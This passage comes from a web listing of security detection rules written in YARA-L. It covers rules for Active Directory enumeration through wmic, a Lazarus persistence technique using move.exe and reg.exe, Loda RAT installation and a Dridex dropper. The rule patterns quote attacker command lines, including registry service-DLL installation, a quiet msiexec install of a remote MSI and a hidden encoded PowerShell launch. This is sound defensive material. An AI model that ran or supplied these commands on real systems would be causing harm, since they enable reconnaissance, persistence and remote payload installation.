/NAMESPACE:\\\\root\\directory\\ldap PATH ds_user GET ds_samaccountname" or $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_group GET ds_samaccountname" or $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_group where \"ds_samaccountname='Domain Admins'\" Get ds_member /Value" or re.regex($selection.target.process.command_line, `wmic path win32_groupuser where \(groupcomponent=\"win32_group\.name=\"domain admins\",domain .*\"\)`) or $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_computer GET ds_samaccountname" or $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_computer GET ds_dnshostname"))
condition:
$selection
}lazarus_attack_variant
Detects a Lazarus attack variant via move.exe and reg.exe License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule lazarus_attack_variant {
meta:
author = "Ariel Millahuel"
description = "Detects a Lazarus attack variant via move.exe and reg.exe License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/XK07zRt3m5OF"
version = "0.01"
created = "2021-03-09"
category = "process_creation"
product = "windows"
mitre = "execution, T1059"
events:
(($selection1.metadata.product_event_type = "4688" or $selection1.metadata.product_event_type = "1") and (($selection1.target.process.file.full_path = "move.exe" and ($selection1.target.process.command_line = "move \"c:\\perflogs\\1.dat\" \"c:\\programdata\\microsoft\\sqcsvc\\sqcsvc6.ldx\"" or $selection1.target.process.command_line = "move \"c:\\perflogs\\1.dll\" \"c:\\windows\\system32\\sqcsvc.dll\"" or $selection1.target.process.command_line = "move \"c:\\perflogs\\1.dll.mui\" \"c:\\windows\\system32\\sqcsvc.dll.mui\"")) or ($selection1.target.process.file.full_path = "reg.exe" and ($selection1.target.process.command_line = "reg add \"HKLM\\SYSTEM\\ControlSet001\\Services\\sqcsvc\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%SystemRoot%\\System32\\sqcsvc.dll\"" or $selection1.target.process.command_line = "reg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v sqcsvc /t REG_ MULTI_SZ /d sqcsvc"))))
condition:
$selection1
}loda_rat_detection
Loda is a Remote Access Trojan with spying capabilities License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule loda_rat_detection {
meta:
author = "Ariel Millahuel"
description = "Loda is a Remote Access Trojan with spying capabilities License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
reference = "https://tdm.socprime.com/tdm/info/yO2dtTK5tKlD"
version = "0.01"
created = "2021-03-09"
category = "process_creation"
product = "windows"
mitre = "execution, T1059"
events:
($selection1.target.process.file.full_path = "cmd.exe" and (re.regex($selection1.target.process.command_line, `cmd\.exe & /C CD C:/ & msiexec\.exe /i http.*://lcodigo\.com/apiW/config/uploads/tmp/.*\.msi /quiet`) or re.regex($selection1.target.process.command_line, `cmd\.exe & /C CD C:/ & msiexec\.exe /i http.*://.*\.com/api.*/config/uploads/tmp/.*\.msi /quiet`)) and ($selection1.metadata.product_event_type = "4688" or $selection1.metadata.product_event_type = "1"))
condition:
$selection1
}malware_dridex_dropper_doc_20191217
Dridex dropper doc (mechanisms from Powershell)
Show query
rule malware_dridex_dropper_doc_20191217
{
meta:
author = "Google Cloud Security"
description = "Dridex dropper doc (mechanisms from Powershell)"
reference = "https://attack.mitre.org/techniques/T1059/"
ref_hash = "57e25974e9e52c87aff9e0cae39bd7670a5d861fd70b9694a43a612cb56c6d88"
yara_version = "YL2.0"
rule_version = "1.0"
events:
$e1.metadata.event_type = "PROCESS_LAUNCH"
re.regex($e1.principal.process.command_line, `powershell -w hidden -en jabf`) nocase
condition:
$e1
}Showing 151-200 of 990